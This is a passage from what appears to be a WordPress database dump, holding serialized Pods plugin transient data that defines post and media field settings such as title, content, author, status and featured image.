;a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:2:{s:14:\"display_filter\";s:9:\"the_title\";s:19:\"display_filter_args\";a:1:{i:0;s:7:\"post_ID\";}}s:5:\"alias\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"name\";}}s:12:\"post_content\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_content\";s:5:\"label\";s:7:\"Content\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:25:\"wysiwyg_allowed_html_tags\";s:0:\"\";s:21:\"wysiwyg_media_buttons\";i:1;s:14:\"display_filter\";s:11:\"the_content\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:12:\"post_excerpt\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_excerpt\";s:5:\"label\";s:7:\"Excerpt\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:20:\"paragraph_allow_html\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";s:14:\"display_filter\";s:11:\"the_excerpt\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"excerpt\";}}s:11:\"post_author\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_author\";s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:16:\"pick_format_type\";s:6:\"single\";s:18:\"pick_format_single\";s:12:\"autocomplete\";s:13:\"default_value\";s:10:\"{@user.ID}\";s:21:\"default_evaluate_tags\";i:1;}s:5:\"alias\";a:1:{i:0;s:6:\"author\";}s:11:\"pick_object\";s:4:\"user\";s:8:\"pick_val\";s:4:\"user\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";}s:9:\"post_date\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_date\";s:5:\"label\";s:12:\"Publish Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:7:\"created\";i:1;s:4:\"date\";}}s:13:\"post_date_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_date_gmt\";s:5:\"label\";s:18:\"Publish Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_status\";s:5:\"label\";s:6:\"Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:5:\"draft\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:11:\"post-status\";s:18:\"pick_format_single\";s:8:\"dropdown\";s:5:\"alias\";a:1:{i:0;s:6:\"status\";}}s:14:\"comment_status\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"comment_status\";s:5:\"label\";s:14:\"Comment Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}}s:11:\"ping_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"ping_status\";s:5:\"label\";s:11:\"Ping Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}s:20:\"hide_in_default_form\";b:1;}s:13:\"post_password\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_password\";s:5:\"label\";s:8:\"Password\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:20:\"hide_in_default_form\";b:1;}s:9:\"post_name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_name\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:4:\"slug\";i:1;s:9:\"permalink\";}}s:7:\"to_ping\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"to_ping\";s:5:\"label\";s:7:\"To Ping\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:6:\"pinged\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"pinged\";s:5:\"label\";s:6:\"Pinged\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"post_modified\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_modified\";s:5:\"label\";s:18:\"Last Modified Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:8:\"modified\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:17:\"post_modified_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:17:\"post_modified_gmt\";s:5:\"label\";s:24:\"Last Modified Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:21:\"post_content_filtered\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:21:\"post_content_filtered\";s:5:\"label\";s:18:\"Content (filtered)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:7:{s:20:\"paragraph_allow_html\";i:1;s:16:\"paragraph_oembed\";i:1;s:21:\"paragraph_wptexturize\";i:1;s:23:\"paragraph_convert_chars\";i:1;s:17:\"paragraph_wpautop\";i:1;s:25:\"paragraph_allow_shortcode\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:9:\"post_type\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:4:\"guid\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"guid\";s:5:\"label\";s:4:\"GUID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"menu_order\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"menu_order\";s:5:\"label\";s:10:\"Menu Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}}s:9:\"post_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_type\";s:5:\"label\";s:4:\"Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:4:\"type\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:14:\"post_mime_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"post_mime_type\";s:5:\"label\";s:9:\"Mime Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"_thumbnail_id\";a:23:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"_thumbnail_id\";s:5:\"label\";s:14:\"Featured Image\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"file\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:16:\"file_format_type\";s:6:\"single\";s:9:\"file_type\";s:10:\"images-any\";s:15:\"file_edit_title\";i:0;s:5:\"alias\";a:0:{}}}}','off'),(5639308,'_transient_timeout_pods_006cb304480e294940b14d5a5e7f3065','1782523316','off'),(5639309,'_transient_pods_006cb304480e294940b14d5a5e7f3065','a:28:{s:11:\"object_type\";s:5:\"media\";s:4:\"type\";s:5:\"media\";s:11:\"object_name\";s:10:\"attachment\";s:19:\"object_hierarchical\";b:0;s:7:\"storage\";s:4:\"meta\";s:5:\"table\";s:8:\"wp_posts\";s:10:\"meta_table\";s:11:\"wp_postmeta\";s:9:\"pod_table\";s:13:\"wp_pods_media\";s:8:\"field_id\";s:2:\"ID\";s:11:\"field_index\";s:10:\"post_title\";s:10:\"field_slug\";s:9:\"post_name\";s:10:\"field_type\";s:9:\"post_type\";s:12:\"field_parent\";s:11:\"post_parent\";s:19:\"field_parent_select\";s:17:\"`t`.`post_parent`\";s:13:\"meta_field_id\";s:7:\"post_id\";s:16:\"meta_field_index\";s:8:\"meta_key\";s:16:\"meta_field_value\";s:10:\"meta_value\";s:12:\"pod_field_id\";s:2:\"id\";s:15:\"pod_field_index\";s:4:\"name\";s:14:\"pod_field_slug\";N;s:16:\"pod_field_parent\";N;s:4:\"join\";a:0:{}s:5:\"where\";a:1:{s:9:\"post_type\";s:30:\"`t`.`post_type` = \'attachment\'\";}s:13:\"where_default\";N;s:7:\"orderby\";s:51:\"`t`.`menu_order`, `t`.`post_title`, `t`.`post_date`\";s:3:\"pod\";O:16:\"Pods\\Whatsit\\Pod\":1:{s:7:\"\0*\0args\";a:11:{s:11:\"object_type\";s:3:\"pod\";s:19:\"object_storage_type\";s:10:\"collection\";s:4:\"name\";s:5:\"media\";s:2:\"id\";s:0:\"\";s:6:\"parent\";s:0:\"\";s:5:\"group\";s:0:\"\";s:5:\"label\";s:5:\"Media\";s:11:\"description\";s:0:\"\";s:4:\"type\";s:5:\"media\";s:7:\"storage\";s:4:\"meta\";s:5:\"adhoc\";b:1;}}s:7:\"recurse\";b:1;s:13:\"object_fields\";a:24:{s:2:\"ID\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:2:\"ID\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:2:\"id\";}s:20:\"hide_in_default_form\";b:1;}s:10:\"post_title\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"post_title\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:2:{s:14:\"display_filter\";s:9:\"the_title\";s:19:\"display_filter_args\";a:1:{i:0;s:7:\"post_ID\";}}s:5:\"alias\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"name\";}}s:12:\"post_content\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_content\";s:5:\"label\";s:7:\"Content\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:25:\"wysiwyg_allowed_html_tags\";s:0:\"\";s:21:\"wysiwyg_media_buttons\";i:1;s:14:\"display_filter\";s:11:\"the_content\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:12:\"post_excerpt\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_excerpt\";s:5:\"label\";s:7:\"Excerpt\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:20:\"paragraph_allow_html\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";s:14:\"display_filter\";s:11:\"the_excerpt\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"excerpt\";}}s:11:\"post_author\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_author\";s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:16:\"pick_format_type\";s:6:\"single\";s:18:\"pick_format_single\";s:12:\"autocomplete\";s:13:\"default_value\";s:10:\"{@user.ID}\";s:21:\"default_evaluate_tags\";i:1;}s:5:\"alias\";a:1:{i:0;s:6:\"author\";}s:11:\"pick_object\";s:4:\"user\";s:8:\"pick_val\";s:4:\"user\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";}s:9:\"post_date\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_date\";s:5:\"label\";s:12:\"Publish Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:7:\"created\";i:1;s:4:\"date\";}}s:13:\"post_date_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_date_gmt\";s:5:\"label\";s:18:\"Publish Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_status\";s:5:\"label\";s:6:\"Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:5:\"draft\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:11:\"post-status\";s:18:\"pick_format_single\";s:8:\"dropdown\";s:5:\"alias\";a:1:{i:0;s:6:\"status\";}}s:14:\"comment_status\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"comment_status\";s:5:\"label\";s:14:\"Comment 